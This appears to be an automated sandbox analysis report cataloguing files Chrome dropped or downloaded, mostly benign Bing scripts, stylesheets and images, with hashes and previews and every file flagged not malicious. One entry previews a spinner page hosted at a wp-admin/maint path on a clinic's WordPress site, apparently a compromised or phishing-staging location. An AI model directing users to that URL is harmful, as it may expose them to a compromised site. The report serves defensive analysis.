                                                                                                      Preview:var RewardsCreditRefresh;(function(n){function r(t,i,r,u,f,e,o,s,h,c,l,a,v,y){sj_cook.set(t,i,r.toString(),!1,"/");sj_cook.set(t,u,f.toString(),!1,"/");sj_cook.set(t,e,o.toString(),!1,"/");sj_cook.set(t,s,h.toString(),!1,"/");sj_cook.set(t,c,l.toString(),!1,"/");sj_cook.set(t,a,v.toString(),!1,"/");sj_evt.fire("RewardsCookieUpdated");sj_evt.bind("identityHeaderShown",function(){return n.RewardsHeaderAnim(o,r,f,y)},1)}function u(n,r,u,f){var c;u=u||r;var o=_ge("id_rh"),e=_ge("rh_animcrcl"),l=_ge("id_rc");if(o&&l&&(e||_ge("givemuid_heart"))&&!(r<0)&&!(r<n)&&!(u<=0)){var a=800,v=r-n,s=Math.min(100,100*(r/u)),h=e&&s>=100&&n<u,y=v>0,p=Date.now();s>=100&&Lib.CssClass.add(o,"rh_reedm");e&&Lib.CssClass.add(e,"anim");c=function(u){if(u){var k=Date.now(),w=k-p,b=Math.min(w/a,1),d=h?t*b:t*s/100,g=y?Math.min(Math.floor((n+b*v)/f)*f,r):r,l=_ge("rewardsAnimation");e&&e.setAttribute("stroke-dasharray",d.toString()+","+t.toString());u.innerText=g.toString();(h||y)&&(w<a?i(function(){return c(u)}):(u.i
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (19606), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):19606
                                                                                                      Entropy (8bit):5.328636903483663
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:3Wsj/9Npzk8fbw3QMXmwOAahGvyBJeXiOOF24eeApyfYRxW+:3z/PpzkLXmw0onXi9F24Cpw43
                                                                                                      MD5:5CD7E9EC89646C664E189CA7BB2A9841
                                                                                                      SHA1:C662DD49F63A3A8C8D6F1AE4309FABB0965A9797
                                                                                                      SHA-256:AD87E00CA1F7A028F7F972199CE9B2B978306C5048EF90802F08BC17EA90A9ED
                                                                                                      SHA-512:DCF14925578A125109054B471A7006A41C98FEF2843DCD4DBD9BD8FFDB4C0802488ED98CF0BD9863A7CFF48C32C1BE73C56097452FF4482D64D7E42B12A09E0F
                                                                                                      Malicious:false
                                                                                                      Preview:var customEvents,__spreadArray,fallbackReplay,EventLoggingModule;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){return i?event?event.toElement:null:n.relatedTarget}function v(n,t,i){while(n&&n!=(i||document.body)){if(n==t)return!0;n=n.p
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1129), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1129
                                                                                                      Entropy (8bit):5.079435667439494
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:PlQiztVfI2TfqkzmGcamP2+SMfpGJYpE4pOGEKebkPtRsBIXOWLp9AYl7qa:NQ6rT29YJYBpGZb0tmetLplea
                                                                                                      MD5:5B3B25FA397E66B3279F4593660F5A8D
                                                                                                      SHA1:E5D52FEE5B28F04DAF2ECFE82E37DFA07977681C
                                                                                                      SHA-256:2EB0F749A518E663AF6828E831D0E437FB38A33D5116E529E93FCF12DBAF91F3
                                                                                                      SHA-512:86437F51C19B55F6D8AED20A62D87BFD69290466A6D3C8157EACC9BA5B6E825A249B8BBA0B133E4BC9A6EF01D70F84EB054397E0C3E046F5216CF59522E919C1
                                                                                                      Malicious:false
                                                                                                      Preview:var CaptionClickable;(function(){function t(){for(var i,r=document.querySelectorAll(".b_caption"),u=document.querySelectorAll(".b_imgcap_altitle"),t=0;t<r.length;t++)i=r[t],i&&n(i);for(t=0;t<u.length;t++)i=u[t],i&&n(i)}function n(n){var t=n.previousElementSibling,u,f,e,r,i,o;if(t&&(u=null,t.tagName==="H2"||t.querySelector("h2")?(f=t.tagName==="H2"?t:t.querySelector("h2"),f&&f.querySelector("a")&&(u=f)):t.tagName==="H3"||t.querySelector("h3")?(e=t.tagName==="H3"?t:t.querySelector("h3"),e&&e.querySelector("a")&&(u=e)):u=n.querySelector("h2, h3"),r=n.querySelector(".b_algoSlug"),r||(r=n.querySelector(".b_ctxtsnip")),u&&r&&(i=u.querySelector("a"),i))){if(r.addEventListener("mouseover",function(){i&&(i.style.textDecoration="underline",n.style.cursor="pointer")}),r.addEventListener("mouseout",function(){i&&(i.style.textDecoration="",n.style.cursor="")}),o=r.parentElement,o&&o.tagName==="A")return;r.addEventListener("click",function(){if(i){_w.si_T&&_w.si_T(i.getAttribute("h"));var n=window.g
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (560), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):560
                                                                                                      Entropy (8bit):4.742600822971018
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:CFmwsCfyMJoAfrk3bV0tRWERW5kTGb3aINVN/t/jgClRXirA:CFmNWaAwRCRWERW5kTGb3l1tMClRd
                                                                                                      MD5:9B28631B7C46706DBB7EEF2D16D9549B
                                                                                                      SHA1:2A463D97AF924D3B10C250181D0D902562494184
                                                                                                      SHA-256:F8FA36AB6505DA51BEF5521EF84793391BE9C16DE5ABD6BB99C20FE4D1FB48CF
                                                                                                      SHA-512:9E85DB806D0CBEEC5007D0AB90BEFA6CB036995110637EC616D93FCC4A2A9BAF59BB0ABEF98913E5D9FD88BE445C9ABC04E0B6C7533E4384F945CB743A4CF488
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/KkY9l6-STTsQwlAYHQ2QJWJJQYQ.js
                                                                                                      Preview:var Lib;(function(n){var t;(function(n){function t(n){return n&&n.classList}function i(n,i){t(n)&&n.classList.add(i)}function r(n,i){t(n)&&n.classList.remove(i)}function u(n,i){t(n)&&n.classList.toggle(i)}function f(n,i){return t(n)&&n.classList.contains(i)}function e(n,t){return n.getElementsByClassName?n.getElementsByClassName(t):null}function o(n){return n instanceof SVGElement?n.getAttribute("class"):n.className}n.add=i;n.remove=r;n.toggle=u;n.contains=f;n.getElementByClassName=e;n.getClassAttribute=o})(t=n.CssClass||(n.CssClass={}))})(Lib||(Lib={}))
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:PNG image data, 60 x 60, 8-bit colormap, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1929
                                                                                                      Entropy (8bit):7.811068957377272
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:SbgS+jqY4I/a8na4MDgpl2RU/gZ2xY5X/:SbgS+x4IJ2Eu/2xC/
                                                                                                      MD5:4C155FCB5DD3DA464451AD240B6DE606
                                                                                                      SHA1:7A6F3C8D8AF764EBFBC97DC0AA8394E73F041270
                                                                                                      SHA-256:D43878B92743C77FDB440C222D97F70CA661122C98B45436D0DA5B2DB98468ED
                                                                                                      SHA-512:061EDA91A7C4679EF824E3E79B8B52090D1DE129D76008B1A697FE7A0F1900B89473EF635A7D2D909C6E684C0BD63B338B89F897F4CC00D5B5C64341A7433136
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR...<...<......")@....PLTEGpL..^.lT.Z.....8.L...._.i..[...^....yu.do.T....|...X.@<.U..W..BL.S. g.(....,.X..l}..%Y.l.L.H...]..Y\.O.Z.m.>.V..t....t.ZH......T...,.....W.@..J...........}.V..qA.b>.6...V..R.F?.w..p.~...J.P....6...U<.W...k'..s.\/..q.]..B..I#..8...yE.;.....V.7..5...l....sw...#.p.....7..>=..m.@..C..T.P..X..n}<...S.....Z..P..]..{..[=..W..Y..R.k.p.]..o.<..N.Z.l ...F.....h@.h..o..u..8=.tC.....k..J..S.H..zT.G?.UH.c.U....%...F=.e...c.....q.wv.Q...H.~r..`.U..J...N.`.*...N..j...i Y..{u....N...f.O...U*...zE.a..U..X..]..k@.....Z.pB.R=.V...S.b..q{..L.......L=.rG..L.......W..a.....T..Y.A......R.........Gb.g..'....R...L....f..Y.&..3.."...ty.b=......U../L.{R.s......j.a..>..#w.Y..P5....H..l......F...o.D7..8....*..h.V..W.`.m.|.U.T....-.."......4.....9.`.M.......2..+...^_..Xq......[tRNS.. .0. ..u.@P..g.h...xwo..(*..h..._.P``....P `..p...P._......@........@@..0.P@@.)=.7....IDATx^..SteI...37Ng.i.3..4.....m...m..j.S....~..s~..u.q.:....)zW...*..y
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (3010), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3010
                                                                                                      Entropy (8bit):5.226871204129987
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:OyuzAwlEG4zh4q8m1FLP2OM+53rW2m7r1zSQh1jyaQ6wsDm:MQG4zhvLuOM+ZW/1rj7Q6wgm
                                                                                                      MD5:12AE5624BF6DE63E7F1A62704A827D3F
                                                                                                      SHA1:C35379FC87D455AB5F8AEED403F422A24BBAD194
                                                                                                      SHA-256:1FB3B58965BEBC71F24AF200D4B7BC53E576D00ACF519FB67FE3F3ABDEA0A543
                                                                                                      SHA-512:DA5F5485E1E0FEB2A9A9DA0EAA342EDAEEEFAF12CE4DCD50D0143BF476356CB171BD62CB33C58E6D9D492D67F281982A99FEF3BFD2EBB9E54CF9782F7B92C17B
                                                                                                      Malicious:false
                                                                                                      Preview:var Swipe;(function(n){function i(n){var i=null,e,r,u,f;return"touches"in n?(e=n,r=e.targetTouches,r&&r.length==1&&(i={pageX:r[0].pageX,pageY:r[0].pageY})):t?(u=n,i={pageX:u.clientX,pageY:u.clientY}):(f=n,i={pageX:f.pageX,pageY:f.pageY}),i!=null&&(i.pageY+=_w.pageYOffset),i}function r(n){var e="getSelection",f=_w[e]||_d[e],t="",i,r,o,u;return f?(i=f(),t+=f(),n&&t!==""&&i.getRangeAt&&(r=i.getRangeAt(0),o=r&&r.getClientRects&&r.getClientRects.length,o>0&&i.removeAllRanges())):_d.selection&&(u=_d.selection,t+=u.createRange().text,n&&t!==""&&u.empty&&u.empty()),!!t}function e(n){sj_pd(n);r(!0)}function o(n,e,o,s,h,c,l,a,v,y){var w,rt,ut,it;o===void 0&&(o=_d.body);s===void 0&&(s=50);h===void 0&&(h=function(){});c===void 0&&(c=function(){});l===void 0&&(l=function(){});a===void 0&&(a=!1);v===void 0&&(v=!1);y===void 0&&(y=2);y=Math.max(y,2);var p=new u,b=null,k="touchstart",d="touchmove",g="touchend",nt="touchout",tt=a||!f;"ontouchstart"in _d.documentElement?(k="touchstart",d="touchmove",g="t
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (10033), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):12895
                                                                                                      Entropy (8bit):5.210985282362867
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:VbgMOzLnhnvZ1czzHT3L0SKZp2NbltyQEZxAk/MkhBMDIkFi2o6XJalZW:9OZrSzz3wp0OxAQjEl
                                                                                                      MD5:51F2DA314598BA3376DBC1429B27A103
                                                                                                      SHA1:6BD3DF8D4EEA73683BFB9D9B9AC780BC9C85687F
                                                                                                      SHA-256:429C376160336DC6F748E45C07DDC068B24635F25A816F9A23D2AC733AAD914F
                                                                                                      SHA-512:942F4D3E5F9F303F0290347EA8689CCC79DA68D7A08AB1447BBE76A62C16534DA9539B617F0669EB2ECB1849384D493A96F65638940A439F526F2CFD00C3DD2B
                                                                                                      Malicious:false
                                                                                                      Preview:0;..;..!function(n,l){"object"==typeof exports&&"undefined"!=typeof module?l(exports):"function"==typeof define&&define.amd?define(["exports"],l):l(n.preact=n.preact||{})}(this,function(n){if(n.render){return;} var l,u,i,t,o,f,r,e={},c=[],s=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i;function a(n,l){for(var u in l)n[u]=l[u];return n}function v(n){var l=n.parentNode;l&&l.removeChild(n)}function h(n,l,u){var i,t,o,f=arguments,r={};for(o in l)"key"==o?i=l[o]:"ref"==o?t=l[o]:r[o]=l[o];if(arguments.length>3)for(u=[u],o=3;o<arguments.length;o++)u.push(f[o]);if(null!=u&&(r.children=u),"function"==typeof n&&null!=n.defaultProps)for(o in n.defaultProps)void 0===r[o]&&(r[o]=n.defaultProps[o]);return y(n,r,i,t,null)}function y(n,u,i,t,o){var f={type:n,props:u,key:i,ref:t,__k:null,__:null,__b:0,__e:null,__d:void 0,__c:null,constructor:void 0,__v:o};return null==o&&(f.__v=f),null!=l.vnode&&l.vnode(f),f}function p(n){return n.children}function d(n,l){this.props=n,this.context
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:GIF image data, version 89a, 66 x 82
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10773
                                                                                                      Entropy (8bit):7.6895795306962915
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:yKvFlvcKod4N5cy7IRZu6ZIliz8Nk3R8MV2jpHBEl67/W7w:NPpodG5cyp+VCBe+/aw
                                                                                                      MD5:F01413D3D4C1B08EDB6A6FB423A52B6C
                                                                                                      SHA1:D70C92B47396FD0C1A1BCE3B91BA909CCE1B6AED
                                                                                                      SHA-256:FC94666F372DEB34DF55E91C49B055A7E938AEF531D38A4E9857EC3D31D13AEE
                                                                                                      SHA-512:C28F301BBC548975F3E9343B80AB7A2EFDB814C71103ED8E197EAB7CBD57CDC11640F31FC43B531FF892A6A9C6B96ECF2A71E82A6BEA392A5A3F83F98736D16E
                                                                                                      Malicious:false
                                                                                                      Preview:GIF89aB.R.....L..M..P..Q..7..R..7..F..I..N..L..M..K..J..F..K..J..B..J..B..K..K..W..D..J..V..L..H..L..P..M..J..L..S..J..P..O..J..K..Q..K..N..K..R..F..K..K..B..I..L..K..R..L..K..K..J..L..W..M..L..M..T..J..G..M..J..O..L..K..I..S..K..H..H..I..L..O..J..L..G..D..N..G..T..M..G..V..G..M..I..K..G..O..K..O..K..J..J..J..J..K..K..K..K..K..J..J..J..b..O..J..G..J..Y..W..N..F..L..I..S..P..J..[..I..M..W..K....!.......!..xmp dataxmp.?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://ww.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about.="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM=http://ns.adobe.com/xap/1.0/mm/" xlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 25.6 (Macintosh)"xmpMM:InstanceID="xmp.iid:7D440496CA811EFBB5DEF6DB70FE4.33" xmpMM:DocumentID="xmp.dd:7D44042A6CA811EFBB5DEF6DB70FE433"> <xmp
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (2447), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2447
                                                                                                      Entropy (8bit):5.8166512571066376
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:vVVcM3lPN1sJeSFE3zYz0lYHbpc/dijVpxN+8m:vBlPNKJeSFjwlY7pvVTzm
                                                                                                      MD5:9BAA6773C6549250A3393E62C56EB395
                                                                                                      SHA1:5BB4EEAD8609CD30B9B96B23EC4FD0082AE64C1D
                                                                                                      SHA-256:DADF403DF8CFE888E59E6A051AEE3783A2BF0BCC60DC1D09A7797DAAEE726CA2
                                                                                                      SHA-512:CF12319CF07897864828D9C950DF4A98A0628D828A7FEE75F1235FC5D3A57C90A40B5DED2743AF2E62B1D13D3F6BE0D302ADA054E7C0D7164B8BA12054909B8D
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/W7TurYYJzTC5uWsj7E_QCCrmTB0.css
                                                                                                      Preview:#rewardsEntryPoint{display:flex;align-items:center;position:fixed;top:78px;left:45px;background:#f2f2f2;color:#111;border-radius:50px;padding-right:3px;font-size:11px;height:26px}#rewardsEntryPoint .defaultText{margin:0 6px 0 12px}#rewardsEntryPoint:hover,#rewardsEntryPoint:focus{cursor:pointer}#rewardsEntryPoint svg{background:url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHZpZXdCb3g9IjAgMCAyMCAyMCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj4KPGcgY2xpcC1wYXRoPSJ1cmwoI2NsaXAwXzM1ODlfNjY1NDIpIj4KPHBhdGggZD0iTTEwIDIwQzQuNDg2MjUgMjAgMCAxNS41MTM4IDAgMTBDMCA0LjQ4NjI1IDQuNDg2MjUgMCAxMCAwQzE1LjUxMzggMCAyMCA0LjQ4NjI1IDIwIDEwQzIwIDE1LjUxMzggMTUuNTEzOCAyMCAxMCAyMFpNMTAgMS4yNUM1LjE3NSAxLjI1IDEuMjUgNS4xNzUgMS4yNSAxMEMxLjI1IDE0LjgyNSA1LjE3NSAxOC43NSAxMCAxOC43NUMxNC44MjUgMTguNzUgMTguNzUgMTQuODI1IDE4Ljc1IDEwQzE4Ljc1IDUuMTc1IDE0LjgyNSAxLjI1IDEwIDEuMjVaIiBmaWxsPSJ1cmwoI3BhaW50MF9saW5lYXJfMzU4OV82NjU0MikiLz4KPHBhdGggZD0iTTcuNSAxMEw5LjA5NjI1IDEwLjhDOC4xNjM3NSAxMS4x
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (1587), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1589
                                                                                                      Entropy (8bit):5.24528911504239
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:KyskFELbJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybibJnSE5aU93HGaQJWAiIh
                                                                                                      MD5:CB027BA6EB6DD3F033C02183B9423995
                                                                                                      SHA1:368E7121931587D29D988E1B8CB0FDA785E5D18B
                                                                                                      SHA-256:04A007926A68BB33E36202EB27F53882AF7FD009C1EC3AD7177FBA380A5FB96F
                                                                                                      SHA-512:6A575205C83B1FC3BFAC164828FBDB3A25EAD355A6071B7D443C0F8AB5796FE2601C48946C2E4C9915E08AD14106B4A01D2FCD534D50EA51C4BC88879D8BEC8D
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/No5xIZMVh9KdmI4bjLD9p4Xl0Ys.js
                                                                                                      Preview:var wln=wln||"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&n.setLoginPreference&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null||t.idp!=="orgid"||(h=n.wlProfile(),h==null||h.name==null||t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a||f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+".")
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1578), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1578
                                                                                                      Entropy (8bit):5.329734499973321
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2QDoc8McY0tjLr4H5uRlcHeO0M2AieYIriev+OmbTkC6+xbDntex3CcldxQp3j7O:NfZuRy0N1eYZ0waSbO3CBp/GiCHAhG
                                                                                                      MD5:0C0AD3FD8C0F48386B239455D60F772E
                                                                                                      SHA1:F76EC2CF6388DD2F61ADB5DAB8301F20451846FA
                                                                                                      SHA-256:DB6DDE4AEF63304DF67B89F427019D29632345D8B3B5FE1B55980F5D78D6E1E7
                                                                                                      SHA-512:E45A51EF2F0021F168A70AC49BDCC7F4FB7B91FF0DDD931F8ECBD70F6494C56285B2D9BC1170804801CE178244CCF361745B677B04C388B608D1471E0695EBEB
                                                                                                      Malicious:false
                                                                                                      Preview:(function(){function d(n,t){for(var r=[],i=0;i<t.length;i++)r.push({MonitorID:t[i].name,RequestID:t[i].guid,Result:Math.round(n[i])});return JSON.stringify(r)}function u(){function n(){return Math.floor((1+Math.random())*65536).toString(16).substring(1)}return n()+n()+n()+n()+n()+n()+n()+n()}function h(){return window.performance&&window.performance.getEntriesByName?!0:!1}function c(n,t,i,r,u,f){function l(i){var w,b,p,k,y,g,nt;if(e!=null&&sb_ct(e),s[i]=c!=null?(new Date).getTime()-c:-1,i=(a+v)%n.length,o=new Image,a++<n.length)c=(new Date).getTime(),o.onload=function(){l(i)},w=function(){o.onload=null;o.onerror=null;c=null;l(i)},e=sb_st(function(){w()},t),o.onerror=function(){e!=null&&sb_ct(e);e=null;w()},o.src=n[i];else{if(r!=null&&r.length!==0){if(h())for(y=0;y<n.length;y++)b=n[y],p=window.performance.getEntriesByName(b),s[y]!=-1&&p&&p[0]&&(s[y]=p[0].duration);for(k=d(s,u),y=0;y<r.length;y++)g=r[y],nt=new Image,nt.src=g+k}f!=null&&f()}}var c,e,s=[],v=Math.floor(Math.random()*n.lengt
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (37756), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):37756
                                                                                                      Entropy (8bit):5.5286674347569065
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:6jiIrpis31lUc4jzmU62pffR75Ql+HCmEOO8C0EBNrpA23/H8tQJ1CN9MQWt3/p9:6Ph31SUA15u+QvctMxbMVX5Xu
                                                                                                      MD5:423885818D67BFCF00E21BE13F6F3A71
                                                                                                      SHA1:A79144758AF1204BB161FCD79E74C1F692AFB7A5
                                                                                                      SHA-256:5BB552BEB00AF20A3A39660DECABBA8520CF53FF43594D1CD923F9217081D169
                                                                                                      SHA-512:99343F25EC96FE803D57A1787CEFF649A5350DE6E5624990214D604CDD6CB3A4C5A8C069A024712C83E70AB91424AC1AC1F7D3C7E16F9FD498342C46DED593A2
                                                                                                      Malicious:false
                                                                                                      Preview:!function(){const noop=()=>{},optionsScript=document.querySelector("script[type=esms-options]"),esmsInitOptions=optionsScript?JSON.parse(optionsScript.innerHTML):{};Object.assign(esmsInitOptions,self.esmsInitOptions||{});let shimMode=!!esmsInitOptions.shimMode;const importHook=globalHook(shimMode&&esmsInitOptions.onimport),resolveHook=globalHook(shimMode&&esmsInitOptions.resolve);let fetchHook=esmsInitOptions.fetch?globalHook(esmsInitOptions.fetch):fetch;const metaHook=esmsInitOptions.meta?globalHook(shimModule&&esmsInitOptions.meta):noop,skip=esmsInitOptions.skip?new RegExp(esmsInitOptions.skip):null;let nonce=esmsInitOptions.nonce;const mapOverrides=esmsInitOptions.mapOverrides;if(!nonce){const nonceElement=document.querySelector("script[nonce]");nonceElement&&(nonce=nonceElement.nonce||nonceElement.getAttribute("nonce"))}const onerror=globalHook(esmsInitOptions.onerror||noop),onpolyfill=esmsInitOptions.onpolyfill?globalHook(esmsInitOptions.onpolyfill):()=>{console.log("%c^^ Module T
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (1949), with no line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):1949
                                                                                                      Entropy (8bit):5.088143640620333
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:koktAKpA72dVRZoSGIAfAoPk0+qhn4bgLTBhzECkVlpjw4on:kJ3i2oV/h+mTkTdon
                                                                                                      MD5:718C9D9C2D2A498DE3C6953B6347A22F
                                                                                                      SHA1:B2F1A5400618972690D509E970CC3ABEB72513F4
                                                                                                      SHA-256:66133F155E3A433E9EECA08DFC3B4E225D358E1A89AB0665379EFF319F9F0081
                                                                                                      SHA-512:AC55EF9F45D29CFCF7D80C009DF4C55335F7C3B55D66AADDE275F580F321125A2C7669F7157D5BF9A34B3513C1231935A461F46EEEBDD87B7801685FC95DC6C3
                                                                                                      Malicious:false
                                                                                                      URL:https://r.bing.com/rp/svGlQAYYlyaQ1QnpcMw6vrclE_Q.js
                                                                                                      Preview:var Pager;(function(n){function f(n,r,u,f,e,o,s,h,c){if(t[n])return t[n];var l=new i(n,r,u,f,e,o,s,h,c);return t[n]=l,l}var u=0,r="active",i=function(){function n(n,t,i,r,f,e,o,s,h){var a=this,v=_ge(n),c,l,y;if(v){if(this.pager=v,this.controlId=t,this.pagerLabels=o,this.activeIndex=s>=0?s:u,this.enableDots=h,this.enableDots)for(c=0;c<i;++c)l=this.getDot(c),l&&(l.pagerindex=c,sj_be(l,"click",function(n){r&&sj_evt.fire("slideexp_slidetoindex",a.controlId,n.target.pagerindex);Log.Log("Click","Pager","ID"+n.target.pagerindex,!1)}));e&&(y=_ge(this.pager.id+"_pager_seemore"),Lib.CssClass.add(y,"enable_fade"),Lib.CssClass.add(v,"enable_fade"),Lib.CssClass.add(y,"pager_seemore_hidden"));sj_evt.bind("pager_updateindex",function(n){if(a.isForMe(n)){var t=n[2];a.updatePager(t,i,f,e)}})}}return n.prototype.getDot=function(n){var t=this.pager.firstElementChild;return t.children[n]},n.prototype.getActiveNode=function(){return this.pager.firstElementChild},n.prototype.updatePager=function(n,t,i,u){va
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:HTML document, ASCII text, with very long lines (1371), with CRLF line terminators
                                                                                                      Category:downloaded
                                                                                                      Size (bytes):2143
                                                                                                      Entropy (8bit):5.382345782068983
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:5r8QfHlCLgc3H4FCpbEhvFDGTFjNBxFkwFCP/FCPF3enYp8888888USNGQgsgYz/:5zfFxcX4ApbExJYbBx2wAP/oPJeS888D
                                                                                                      MD5:F288CC4ADEE35582A880D5F8C265185A
                                                                                                      SHA1:62390723F045980C640151CAECD0B61DBE70857F
                                                                                                      SHA-256:AFE81794DC8F9CA7FB9180039A1AD474AFEA7784F7A9BE71B0A6324CD108F25D
                                                                                                      SHA-512:87526ADF6761CD09E01860A2EB7F502485E1ED66BD37FA2942CECB585B0B5D0D29DACD0AEE4D05CA16A9460EBE129D036378E68915BE5E91319D7CD78871076C
                                                                                                      Malicious:false
                                                                                                      URL:https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Preview:<html>...<head>....<meta name="robots" content="noindex, nofollow">....<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">....<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">....<style>body,html{margin:30px;display:flex;justify-content:center;align-items:center;flex-direction:column}.contract {position: relative;width: 80px;height: 80px;}.contract div {animation: 1.2s cubic-bezier(.5, 0, .5, 1) infinite contract;transform-origin: 40px 40px;}.contract div:after {content: " ";display: block;position: absolute;width: 7px;height: 7px;border-radius: 50%;background: #737373;margin: -4px 0 0 -4px;}.contract div:first-child {animation-delay: -36ms;}.contract div:first-child:after {top: 63px;left: 63px;}.contract div:nth-child(2) {animation-delay: -72ms;}.contract div:nth-child(2):after {top: 68px;left: 56px;}.contract div:nth-child(3) {animation-delay: -108ms;}.contract div:nth-child(3):after {top: 71px;left: 48px;}.contract div:nth-child(4) {ani
                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      File Type:ASCII text, with very long lines (6526), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6526
                                                                                                      Entropy (8bit):5.372135202911853
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:/CaRENlgVMJhPbrtwyGBdnxEd7NUCuf1bx6gqkJD:aaREXPbOLdxEd7NUnf1twI
                                                                                                      MD5:6904ABA1CE02BB3A01B6550C4BF98A7E
                                                                                                      SHA1:858127221DAF72534247D665BE661A175FAD6DD6
                                                                                                      SHA-256:4492B7EF7F9E30168D8F6410FF6928FCC3019618019116F82B25459B9267B038
                                                                                                      SHA-512:EBD259047BCDED6F925C3184A27D0D197D48B0EE3EBC2C12A27A2C9843B08C551D6DC34C299CD6E4931446F33C1D6BFF3F8CDEB018FB6C614671CF43B6497585
                                                                                                      Malicious:false
